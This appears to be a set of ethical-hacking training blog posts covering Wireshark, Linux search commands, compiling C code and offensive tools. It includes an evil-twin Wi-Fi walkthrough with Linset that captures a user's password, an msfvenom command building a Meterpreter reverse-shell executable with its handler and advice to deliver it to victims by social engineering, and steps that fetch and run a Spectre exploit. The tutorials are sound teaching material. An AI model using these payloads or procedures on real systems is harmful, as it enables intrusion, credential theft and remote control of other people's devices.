What is Wireshark?


Wireshark is the most widely used network protocol analyzer. A free and open-source packet analyzer released under the terms of the GNU General Public License (GPL), it is mainly used for network troubleshooting, analysis, software and communications protocol development, and education. It shows its user what is happening on the network at a microscopic level. A majority of commercial and non-profit organizations, government agencies, and educational institutions use Wireshark.

History:

In 1998 Gerald Combs, a computer science graduate of the University of Missouri-Kansas City, started a project named Ethereal. It was the foundation of Wireshark, which has carried its current name since 2006, when Combs went to work for CACE Technologies while holding the copyright on most of the project’s code. The rest of the code remained open for modification under the GPL terms. Volunteer contributions from network experts around the world then grew the project into the famous and widely used tool it is today.

Because Combs did not own the Ethereal trademark, he decided to change its name to Wireshark. In 2010 Riverbed Technology purchased CACE Technologies and became the main sponsor of Wireshark. There are several contributors –around 600 authors– to this product; still, Combs remains primarily responsible for maintaining the overall code and releasing new versions of Wireshark.

Wireshark has won several awards for its vital role in today’s network security. It received the Most Important Open-Source App of All Time award from eWeek and the Editor’s Choice award from PC Magazine. In addition, the Insecure.Org network security tools survey ranked it as a top packet sniffer.

The functionality of Wireshark:

Similar to tcpdump, a common packet analyzer, Wireshark lets us analyze network packets, but with the aid of a graphical front-end and some extra integrated sorting and filtering options. A Network Interface Controller (NIC) is put into promiscuous mode if it supports that mode, so that all traffic on the interface can be seen, not merely traffic to the interface’s configured addresses and broadcast/multicast traffic.

However, promiscuous mode on a switch port does not necessarily see all the network traffic, so to get the entire traffic, other techniques such as port mirroring and network taps are used together with promiscuous mode.

Wireshark 1.4 and later can put wireless network interface controllers into monitor mode. If packets are captured by a remote machine and sent to Wireshark using the TZSP protocol or OmniPeek’s protocol (OmniPeek is another packet analyzer), Wireshark dissects them, so packets captured on a remote machine can be analyzed at the time they are captured.

What features does Wireshark include?

In fact, Wireshark offers a large set of features. In the following points, I will attempt to summarize the features that Wireshark offers:

  • Wireshark is a network analyzer that inspects hundreds of protocols.
  • It allows both offline analysis and live captures.
  • It runs on diverse operating systems such as Microsoft Windows, Linux, macOS, Sun Solaris, and several other platforms.
  • A graphical user interface (GUI) built with the Qt widget toolkit lets us browse captured network data; in the non-GUI version, the TTY-mode TShark utility can be used for the same purpose.
  • It offers Voice over Internet Protocol (VoIP) analysis. We can even play the media flow when decoding such captured traffic.
  • Wireshark uses pcap to capture packets.
  • It handles capture files in gzip format, which are easily decompressed.
  • Captured files can be programmatically edited or converted with the editcap program via command-line switches.
  • It allows capturing raw Universal Serial Bus (USB) traffic.
  • Wireshark can read packets from ns, OPNET Modeler, NetSim, and other network simulation tools.
  • It supports reading and writing many capture file formats such as tcpdump (libpcap), which is its native trace file format, Pcap NG, Catapult DCT2000, Cisco Secure IDS iplog, Microsoft Network Monitor, Network General Sniffer, Sniffer Pro, NetXray, Network Instruments Observer, NetScreen snoop, Novell LANalyzer, RADCOM WAN/LAN Analyzer, Shomiti/Finisar Surveyor, Tektronix K12xx, Visual Networks Visual UpTime, WildPackets EtherPeek/TokenPeek/AiroPeek and several other formats.
  • It reads live data from Ethernet, IEEE 802.11, PPP/HDLC, ATM, loopback, Bluetooth, FDDI, and many other link types.
  • Decryption is supported for many protocols, including IPsec, ISAKMP, Kerberos, SNMPv3, SSL/TLS, WEP, and WPA/WPA2.
  • Coloring rules applied to the packet list allow quick and easy analysis. See the Color Coding section below for further details.
  • Filters, timers, and other settings ensure that only the traffic of interest is analyzed.
  • Output can be exported and formatted as XML, PostScript, CSV, or plain text.

Security Policies:

In general, no special privileges are needed to run Wireshark or TShark themselves. Nowadays only tcpdump or dumpcap needs special privileges to capture traffic on a machine; the user needs no further privileges.

But how can a superuser grant the required privileges to a user? The answer lies in the fact that tcpdump or dumpcap, which come with Wireshark, must be given special privileges so they can capture packets into a file. That file can then be opened in Wireshark for analysis with seriously restricted privileges. On wireless networks, the Aircrack wireless security tools can likewise capture IEEE 802.11 frames, and the resulting tcpdump/dumpcap files can be read with Wireshark afterward.

Why restrict users from running Wireshark and its tools with full privileges? Capturing traffic invokes an enormous number of protocol dissectors, which is a network security risk: a bug in one of these dissectors could be found and exploited, putting the entire system at great risk. That is why running Ethereal/Wireshark in the past required superuser privileges, so that one person was responsible for what could potentially be affected.

Filtering Packets:

Sometimes we need to capture specific traffic, such as the packets a program sends when phoning home. With a large number of packets on the network, one would otherwise have to close every other application using the network in order to isolate a specific traffic type. This is where Wireshark’s filters come in. At the top of the window there is a filter box; type a filter name there and click Apply, or press Enter. For instance, to see only DNS packets, type “DNS” in the filter box. Wireshark auto-completes filter names as you type them.

Color Coding:

The colors green, blue, and black distinguish the types of captured packets. By default, green indicates Transmission Control Protocol (TCP) traffic. Dark blue is Domain Name System (DNS) traffic, light blue is User Datagram Protocol (UDP) traffic, and black marks TCP packets with problems, such as packets delivered out of order.
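As an added example (not Wireshark’s own code, and not from the original post), the following Python script shows the mechanics behind the filtering and color-coding sections above: it parses the libpcap format Wireshark reads natively, dissects Ethernet/IPv4/UDP/TCP, applies a display filter such as dns or tcp.port == 443, and assigns the default colour names (green for TCP, dark blue for DNS, light blue for UDP). The capture bytes, addresses and ports are constructed for the example; the filter-term lowercasing is a convenience the example adds.

```python
"""Read a libpcap file, apply a display filter, colour packets like Wireshark.

Added example (not Wireshark code).  The capture below is constructed by
hand so the script runs offline; filter terms are lowercased before
matching, which is a convenience this example adds."""
import struct

COLORS = {"dns": "dark blue", "udp": "light blue", "tcp": "green"}

def ipv4_frame(src, dst, proto, payload):
    """Ethernet II + IPv4 header (no options, checksum left zero) + payload."""
    eth = bytes.fromhex("aabbccddeeff" "001122334455" "0800")
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(payload), 0, 0, 64, proto, 0,
                     bytes(map(int, src.split("."))), bytes(map(int, dst.split("."))))
    return eth + ip + payload

def udp(sport, dport, data):
    return struct.pack("!HHHH", sport, dport, 8 + len(data), 0) + data

def tcp(sport, dport, flags):
    # data offset 5 words; seq, ack, checksum and urgent pointer zeroed
    return struct.pack("!HHIIHHHH", sport, dport, 0, 0, (5 << 12) | flags, 8192, 0, 0)

def build_pcap(frames):
    """libpcap global header (little-endian, linktype 1 = Ethernet) + records."""
    out = struct.pack("<IHHiIII", 0xA1B2C3D4, 2, 4, 0, 0, 65535, 1)
    for i, f in enumerate(frames):
        out += struct.pack("<IIII", i, 0, len(f), len(f)) + f   # ts_sec, ts_usec, caplen, len
    return out

# Constructed sample capture: a DNS query, a TCP SYN to port 443, a plain UDP datagram.
SAMPLE_CAPTURE = build_pcap([
    ipv4_frame("10.0.0.5", "10.0.0.1", 17, udp(51234, 53, bytes(12))),
    ipv4_frame("10.0.0.5", "93.184.216.34", 6, tcp(40000, 443, 0x02)),
    ipv4_frame("10.0.0.5", "10.0.0.99", 17, udp(5000, 5001, b"hello")),
])

def read_pcap(data):
    """Yield each captured frame from a little-endian libpcap file."""
    if struct.unpack_from("<I", data, 0)[0] != 0xA1B2C3D4:
        raise ValueError("not a little-endian libpcap file")
    off = 24
    while off < len(data):
        caplen = struct.unpack_from("<IIII", data, off)[2]
        off += 16
        yield data[off:off + caplen]
        off += caplen

def dissect(frame):
    """Return the protocol layers plus a few fields under Wireshark-style names."""
    info = {"protocols": ["eth"]}
    if struct.unpack_from("!H", frame, 12)[0] != 0x0800:
        return info                                  # not IPv4: stop here
    ip = frame[14:]
    l4 = ip[(ip[0] & 0x0F) * 4:]                     # skip IHL*4 header bytes
    info["protocols"].append("ip")
    info["ip.src"] = ".".join(map(str, ip[12:16]))
    info["ip.dst"] = ".".join(map(str, ip[16:20]))
    if ip[9] == 17:
        info["udp.port"] = struct.unpack_from("!HH", l4, 0)
        info["protocols"].append("udp")
        if 53 in info["udp.port"]:                   # DNS over UDP/53
            info["protocols"].append("dns")
    elif ip[9] == 6:
        info["tcp.port"] = struct.unpack_from("!HH", l4, 0)
        info["protocols"].append("tcp")
    return info

def matches(info, display_filter):
    """Subset of display-filter syntax: protocol names and 'field == N', joined by '&&'."""
    for term in display_filter.lower().split("&&"):
        if "==" in term:
            field, value = (s.strip() for s in term.split("=="))
            if int(value) not in info.get(field, ()):
                return False
        elif term.strip() not in info["protocols"]:
            return False
    return True

def color_of(info):
    """The most specific default colouring rule wins, as in Wireshark's rule list."""
    for proto in ("dns", "udp", "tcp"):
        if proto in info["protocols"]:
            return COLORS[proto]
    return "none"

def packet_list(pcap_bytes, display_filter):
    """Rows of (colour, top protocol, src, dst) for the packets passing the filter."""
    rows = []
    for frame in read_pcap(pcap_bytes):
        info = dissect(frame)
        if matches(info, display_filter):
            rows.append((color_of(info), info["protocols"][-1],
                         info.get("ip.src", "-"), info.get("ip.dst", "-")))
    return rows
```

Calling packet_list(SAMPLE_CAPTURE, "dns") returns just the query row coloured dark blue, while "ip" returns all three rows in the green/blue scheme described above; a real capture from dumpcap in classic pcap format can be passed in place of the constructed bytes.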

Try Certified Ethical Hacker for FREE!!!https://infosecaddicts.com/course/certified-ethical-hacker-v10/


Elsewhere, check out my other post about Metasploit.

How to find stuff in Linux

You’ll often find yourself looking for things. Here are some commands that have proven useful for finding things in Linux.

find is a popular command-line tool that searches for files in a directory hierarchy. It searches the given directory and recursively its subdirectories for the supplied criteria.

The -name argument matches a specific name pattern. Of note, find is case sensitive, so use -iname to avoid missing what you are looking for.

find . -name file

locate is a very fast way of searching for files on disk because it searches a prebuilt database of file paths rather than the filesystem itself. By default, locate does not check whether the files in its database still exist. The database that locate searches is updated with the updatedb command. Try locating a file on the Strategic Security Ubuntu VM: using locate without any options brings up every path that contains the keyword.

Let’s locate the file r00kies. For this example, use the touch command to create three different files with r00kies in the name, and make sure to update the database afterwards with sudo updatedb.

This shows us 3 files, but we only wanted the r00kies files. Let’s use the -b option to search exactly for what we want. The backslash disables the implicit replacement of “r00kies” by “*r00kies*”, so you end up with only what we are looking for.

locate -b '\r00kies'

whereis searches for binary files, source files, and man pages. This is useful when determining where a file is executed from. To show only the executable, use the -b option.

whereis firefox
whereis -b firefox

which returns the absolute path of the executable that would run for a given command name. This makes creating shortcuts a bit easier. By default, which shows only the first matching executable; to display all results, use the -a option. Only the current user’s PATH variable is searched.

which firefox
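As an added example (not part of the original post), the Python script below reproduces the search semantics the commands above rely on, so the differences can be checked without touching the real system: the case sensitivity of -name versus -iname, locate’s prebuilt and possibly stale database, its -b basename-only mode and the backslash that disables the implicit *keyword* wildcard (modelled here as an exact=True flag, an assumption of this example), and which versus which -a over PATH order. The directory tree, the r00kies files and the two fake firefox executables are constructed in a temporary directory.

```python
"""The search semantics of find, locate and which, reproduced in Python.

Added example, not from the original post.  It rebuilds the behaviours the
post describes on a throw-away directory tree constructed here, so nothing
on the real system is touched."""
import fnmatch
import os
import shutil
import tempfile

def walk_names(root):
    """Every directory and file below root as (dirpath, name) pairs."""
    for dirpath, dirnames, filenames in os.walk(root):
        for name in dirnames + filenames:
            yield dirpath, name

def find_name(root, pattern, ignore_case=False):
    """`find ROOT -name PATTERN` (or -iname): glob against each basename."""
    if ignore_case:
        pattern = pattern.lower()
    return sorted(os.path.join(d, n) for d, n in walk_names(root)
                  if fnmatch.fnmatchcase(n.lower() if ignore_case else n, pattern))

def updatedb(root):
    """Stand-in for updatedb: snapshot every path into the locate database."""
    return sorted(os.path.join(d, n) for d, n in walk_names(root))

def locate(db, keyword, basename_only=False, exact=False):
    """`locate KEYWORD` implicitly searches *KEYWORD* (substring) in the whole
    stored path; -b restricts it to the basename; a leading backslash in the
    real tool turns off the implicit wildcard, modelled here as exact=True.
    The database is consulted as-is: deleted files still appear."""
    hits = []
    for path in db:
        subject = os.path.basename(path) if basename_only else path
        if (subject == keyword) if exact else (keyword in subject):
            hits.append(path)
    return hits

def which(name, path_dirs, all_matches=False):
    """`which NAME` gives the first executable in PATH order; -a gives them all."""
    hits = []
    for d in path_dirs:
        candidate = os.path.join(d, name)
        if os.path.isfile(candidate) and os.access(candidate, os.X_OK):
            hits.append(candidate)
            if not all_matches:
                break
    return hits

def lab():
    """Build the constructed tree, run each search, return paths relative to it."""
    root = tempfile.mkdtemp(prefix="findlab-")

    def relative(paths):
        return sorted(os.path.relpath(p, root) for p in paths)

    try:
        for d in ("r00kies-dir", "bin1", "bin2"):
            os.makedirs(os.path.join(root, d))
        for f in ("r00kies.txt", "R00KIES.md", "r00kies-dir/notes", "bin1/r00kies"):
            open(os.path.join(root, f), "w").close()
        for f in ("bin1/firefox", "bin2/firefox"):          # two executables, two PATH dirs
            open(os.path.join(root, f), "w").close()
            os.chmod(os.path.join(root, f), 0o755)
        db = updatedb(root)                                   # sudo updatedb
        os.remove(os.path.join(root, "r00kies.txt"))          # deleted after updatedb ran
        path = [os.path.join(root, "bin1"), os.path.join(root, "bin2")]
        return {
            "find -name":   relative(find_name(root, "r00kies*")),
            "find -iname":  relative(find_name(root, "r00kies*", ignore_case=True)),
            "locate":       relative(locate(db, "r00kies")),
            "locate -b":    relative(locate(db, "r00kies", basename_only=True)),
            "locate -b \\": relative(locate(db, "r00kies", basename_only=True, exact=True)),
            "which":        relative(which("firefox", path)),
            "which -a":     relative(which("firefox", path, all_matches=True)),
        }
    finally:
        shutil.rmtree(root)
```

Running lab() shows the stale r00kies.txt still listed by locate after it was deleted (find no longer sees it), the directory component r00kies-dir pulling in notes until -b is used, and only bin1/firefox returned by which unless -a is given.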


Linset

Linset is a tool of Spanish origin, which is why some of the screenshots are in Spanish.

If you are one of the people who like to test the security of wireless networks, Wifislax is a Linux distribution that will help you a lot. In this post, we will show you one of the tools integrated into it.

The first thing we have to do is to download Wifislax.

Download links:

LINK1 OFFICIAL FTP: http://www.downloadwireless.net/isos/wifislax64-1.0-final.iso

LINK2 MEDIAFIRE: http://www.mediafire.com/file/25rsmyz449g2csc/wifislax64-1.0-final.iso

LINK3 MEGA:  https://mega.nz/#!jsglSLxb!bZgdN7yeWvL2-xzPv7-15FOHf8FHnH6lWvCNogy2hTQ

DRIVER NVIDIA: http://www.mediafire.com/file/zoaebscconl6xrv/Driver_NVIDIA-367.57_wifislax64-x86_64-8sw.xzm

DRIVER AMD: http://www.mediafire.com/file/l422ezur7z2b61o/Driver_AMD-15.12_wifislax64-x86_64-8sw.xzm

After the download, you can install it as a virtual machine or on a USB pen drive. When Wifislax starts we will see the following options; select Run with SMP kernel and press Enter.

Select wifislax with KDE Desktop and enter.

Wait for Wifislax to show its desktop environment.

If you have Wifislax installed as a virtual machine, you must connect a Wi-Fi antenna (it can be USB) and configure VirtualBox or VMware to recognize your USB Wi-Fi card.

Now we click on linset as shown in the following image.

At this moment we have our tool ready to use.

The first thing it asks us is which adapter we want to use. In this case we only have one option, so we press the 1 key and Enter.

Then it asks whether we want all channels or a specific channel. Take option one to analyze all the channels.

As you can see, we are now scanning the Wi-Fi networks that our antenna can capture.

For this case we will take the network called INFOSECADDICTS.

We close the scanning window to get the other options.

We choose option 1.

We select option 1 to perform a massive de-authentication of the AP.

We have captured the handshake.

We choose option 1, which corresponds to a neutral interface.

We select the English language.

Now we just have to wait for the user to connect so that linset will ask for the password.

Below we have a screenshot of the experience of a normal user connected to the network.

We have cloned the AP automatically as shown in the following image.

As soon as a user connects, we can see which sites he is visiting.

Now the user is forced to enter the password again.

Bingo, we have captured the password. We can now use Metasploit or any other tool to compromise the connected devices in the network.


How to use msfvenom

Msfvenom combines payload generation and encoding. It replaced msfpayload and msfencode on June 8th, 2015.

Open the Ubuntu terminal as the root user.

The new tool msfvenom includes built-in help in the terminal itself so that we know the “flags” we can use; to open this help it is enough to type:

To see what payloads are available from Framework, you can do:

msf5> msfvenom -l payloads

or

# msfvenom -l payloads

How to generate a payload

This command uses msfvenom to create a malicious executable file that will open a Meterpreter session using a reverse TCP payload. The listening host is your own computer.

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.14 LPORT=4444 -f exe -a x64 -o /home/infosecaddicts/infosecaddicts.exe

We have created our malicious file called infosecaddicts.exe.

This handler will listen for the payload and attempt to open a Meterpreter session on the victim’s computer.

msf> use exploit/multi/handler
msf> set PAYLOAD windows/x64/meterpreter/reverse_tcp
msf> set LHOST 192.168.1.14
msf> set LPORT 4444
msf> run

After creating our malicious file we just have to get it onto the victim machine and execute it; you can use social engineering or any other method.

As a result, you will have the meterpreter session.

In the same way that we did it for Windows, we can do it for any other operating system, for example Android, iOS, Linux, etc.


Compiling code in Linux

Cybersecurity tools are not always ready to run on our operating system; many times we will find an application only as source code rather than as a binary, so knowing how to compile code in Linux is an essential skill on the way to becoming a security expert.

A compiler translates high-level code into low-level or machine code. There are many ways to compile code in Linux. To compile C code you need the gcc compiler installed on your system; it is responsible for translating the high-level code into binary code the machine understands. In the same way, programming languages such as Ruby, Python, and others use their own compiler to be executed on the system.

Binary and Source Code

Before running a program on a Unix-like system, we must first compile it and then execute it. A program can be available as a binary or as source code.

A binary is a package that has already been pre-compiled. In general, a binary matches the OS platform, meaning the application has been built for a specific architecture; for example, we may find a .deb binary for AMD64 or an .rpm for i386. We put the binary into our filesystem and install it with a package manager such as apt or yum. In theory it could then be executed, but if the required dependencies or libraries are not installed on the system, the program will not work. That is why we must be sure that everything the application needs is present on the system.

It is important to understand that we will not always find a package for a given system, so the option is to compile the source code, which is not tied to any architecture or system. The source code is, so to speak, the raw code in a defined format so that it can be compiled. In general, source code is packaged into a compressed .tar or .zip archive.

Ways to compile source code in Linux:

In Linux we can compile code in different ways: using the language’s own compiler or using operating-system tools.

Using a Language compiler

For our lab we will use the ubuntu-infosecaddicts VM and the exploit found at https://github.com/Eugnis/spectre-attack/archive/master.zip. This exploit is written in C and we will use the GNU gcc compiler. It attacks the processor, breaking isolation and extracting data from memory.

Most Unix-like systems ship with the gcc compiler. GCC is the GNU project’s integrated compiler for C, C++, Objective-C and Fortran; it can take a source program in any of these languages and generate a binary executable for the machine it has to run on. The acronym GCC means “GNU Compiler Collection”; originally it meant “GNU C Compiler”. gcc is still used to invoke a C compilation, and g++ refers to a C++ compilation.

First, check whether gcc is installed by running:

gcc --version

The syntax is:

gcc [options] <sourcecode.c> -o <output>

Now:

1. Download the source:
wget https://github.com/Eugnis/spectre-attack/archive/master.zip
2. Unzip it:
unzip master.zip
3. Enter the uncompressed directory:
cd spectre-attack-master
4. Compile:
gcc Source.c -o spectre.out
(If we open spectre.out with any text editor we will see that it is not human readable.)
5. Execute:
./spectre.out

If the processor is vulnerable we will see the message “The Magic Words are Squeamish Ossifrage” read from memory.

In this case, gcc creates the binary spectre.out which is the executable program itself.

Using the operating system tools


Unix-like systems have several tools that help when compiling code, one of which is the very well known GNU make.

The make utility automatically determines which pieces of a large program need to be recompiled, and issues commands to recompile them.

A project needs to meet some criteria so that it can be compiled with the make tool. Each project needs a Makefile. A Makefile is a script that describes the project structure, namely, the source code files, the dependencies between them, compiler arguments, and how to produce the target output.

Examining our master.zip file, we see a file named makefile; next, we compile our source code with it:

  1. Enter the directory: cd spectre-attack-master
  2. Run make -f makefile

This action will create the binary spectre.out similar to the previous process using gcc as a compiler.
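As an added example (not part of the original post or of the spectre-attack project), the Python script below shows the decision make applies when it "determines which pieces need to be recompiled": a target is rebuilt when it is missing or older than any of its prerequisites, checked depth first through the dependency graph. It parses a tiny constructed Makefile that mirrors the gcc Source.c -o spectre.out step, and takes file timestamps from a dict instead of the filesystem so the logic can be exercised offline; the rule/target names and timestamps are assumptions of the example.

```python
"""Why make rebuilds some targets and leaves others alone.

Added example, not from the original post or the spectre-attack project.
The Makefile text and the timestamps are constructed; mtimes maps a file
name to its modification time, and a missing key means the file does
not exist."""

# Constructed Makefile. Recipe lines must start with a tab, as in real make.
MAKEFILE = (
    "all: spectre.out\n"
    "spectre.out: Source.c\n"
    "\tgcc $< -o $@\n"
)

def parse_makefile(text):
    """Return {target: {"deps": [...], "recipe": [...]}} from 'target: deps' rules."""
    rules, current = {}, None
    for line in text.splitlines():
        if not line.strip() or line.lstrip().startswith("#"):
            continue
        if line.startswith("\t"):                  # recipe line of the last target
            rules[current]["recipe"].append(line[1:])
        else:
            target, deps = line.split(":", 1)
            current = target.strip()
            rules[current] = {"deps": deps.split(), "recipe": []}
    return rules

def plan(target, rules, mtimes, commands=None):
    """Depth-first walk like make: decide whether each target's recipe must run
    and append the expanded commands ($@ = target, $< = first prerequisite)
    in build order.  Returns the list of commands make would execute."""
    commands = [] if commands is None else commands
    rule = rules.get(target)
    if rule is None:                               # plain source file, nothing to build
        if target not in mtimes:
            raise FileNotFoundError(f"No rule to make target '{target}'")
        return commands
    dep_rebuilt = False
    for dep in rule["deps"]:
        before = len(commands)
        plan(dep, rules, mtimes, commands)
        dep_rebuilt |= len(commands) > before      # a rebuilt dep is newer by definition
    own_time = mtimes.get(target)
    dep_newer = any(d in mtimes and (own_time is None or mtimes[d] > own_time)
                    for d in rule["deps"])
    if own_time is None or dep_rebuilt or dep_newer:
        first = rule["deps"][0] if rule["deps"] else ""
        commands.extend(c.replace("$@", target).replace("$<", first) for c in rule["recipe"])
    return commands

def scenarios():
    """Four constructed situations: up to date, source edited, never built, no source."""
    rules = parse_makefile(MAKEFILE)
    up_to_date = plan("all", rules, {"Source.c": 100, "spectre.out": 200})
    source_edited = plan("all", rules, {"Source.c": 300, "spectre.out": 200})
    never_built = plan("all", rules, {"Source.c": 100})
    try:
        plan("all", rules, {})
        no_source = None
    except FileNotFoundError as err:
        no_source = str(err)
    return up_to_date, source_edited, never_built, no_source
```

scenarios() returns an empty command list when spectre.out is newer than Source.c, the single gcc command when the source was edited or the binary was never built, and make’s "No rule to make target" error when Source.c itself is missing, which is exactly the behaviour observed when running make in the project directory.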